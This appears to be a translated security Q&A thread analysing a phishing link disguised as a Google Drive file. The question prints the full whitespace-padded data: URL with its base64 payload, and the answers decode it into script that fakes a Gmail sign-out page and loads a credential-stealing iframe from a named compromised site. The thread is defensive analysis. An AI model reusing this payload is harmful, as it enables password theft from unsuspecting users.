我收到了一位同事发来的电子邮件,其中附带的文件似乎位于Google云端硬盘上,点击后会显示以下网址,重新创建Google帐户登录页面以窃取密码:
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gY307aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSl7ZFtjXT1rW2NdfHxjfWs9W2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZXR1cm4gcH0oJzMuMi4xNj0iMTUgMTQgMTMgMTcgMTgiOzIxeygyMCgpezE5IDE9My4yLjEyKFwnMVwnKTsxLjEwPVwnNy84LTZcJzsxLjExPVwnOSA2XCc7MS4yMj1cJ1wnOzIuMzEoXCczNFwnKVswXS4yMygxKX0oKSl9MzMoMzUpe30zLjIuMzYuMzc9Ijw0IDM5PVxcIjM4Oi8vMzIuMjYvMjUtMjQvXFwiIDI3PVxcIjI4OiAwOzMwOiA1JTsyOTo1JVxcIj48LzQ+IjsnLDEwLDQwLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWZyYW1lfDEwMHxpY29ufGltYWdlfHh8c2hvcnRjdXR8dHlwZXxyZWx8Y3JlYXRlRWxlbWVudHxiZWVufGhhdmV8WW91fHRpdGxlfFNpZ25lZHxvdXR8dmFyfGZ1bmN0aW9ufHRyeXxocmVmfGFwcGVuZENoaWxkfGNvbnRlbnR8d3B8Y2x1YnxzdHlsZXxib3JkZXJ8aGVpZ2h0fHdpZHRofGdldEVsZW1lbnRzQnlUYWdOYW1lfGJsdWV2b2ljZXBnaHxjYXRjaHxoZWFkfGV8Ym9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E
如果我输入了我的电子邮件地址和密码,从脚本中是否有任何方法可以识别信息的发送位置?
答案 0 :(得分:3)
让我们尽可能地打破攻击:
这是一个网址,从基本的gmail登录链接开始,如果可能的话,它会设置一些请求变量以自动登录。
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
之后是大量空白空间,用于隐藏浏览器地址栏中的恶意有效负载。
%20%20%20%20%20%20%20%20%20%20%20%(等)
现在跟随受害者的有效载荷。它是base64编码的。
当我们解码它时,它看起来像这样:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function ()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
这是 evil ,混淆了javascript。不要执行它。
martinstoeckli的回答包含此脚本的扩展版本。
它设置当前标签的标题以模仿gMail的“你已经退出”页面,并改变页面,添加一个没有边框的屏幕填充iframe。
iFrame指向(似乎是)受损的wordpress网站,其中包含伪造的gmail登录页面。
将凭据输入bluevoicepgh.club上托管的虚假页面后(有人可能想要通知这些人他们的wordpress网站可能已被盗用),然后您将被重定向到在后台默默登录的gmail页面。无论您在虚假登录页面中输入的凭据是否正确,都会发生这种情况。
如果您确实在该页面中输入了有效的凭据,除非您可以查看其背后的脚本,否则无法知道它将会消失的位置。
请记住,(幸运的是)目前的形式,攻击无法正常运行,因为谷歌的登录页面使用https(并强制使用https)。 由于chrome会在脚本执行时提醒我们:
Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.
答案 1 :(得分:1)
该脚本无法正常工作,因为谷歌正在发送x-frame-options = deny(浏览器会尊重此标题),但链接的意图如下:
%20是空白,这样就希望隐藏网址的内容,因为以下内容可能会超出可见区域。也许有人想分析这个框架,但应该小心处理,恶意域名是bluevoicepgh。
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
答案 2 :(得分:0)
最好的解决方法是,当它提示您输入您的凭据时,请检查您实际所在的域名。如果是Google域名,那么就可以了,如果没有,那么它就是与之相关的内容网络钓鱼。
在这里你应该非常小心地检查域名,攻击者发挥作用,如果域名谷歌他们创建非常相似的东西,如gooogle或geogle的东西。所以仔细检查域名。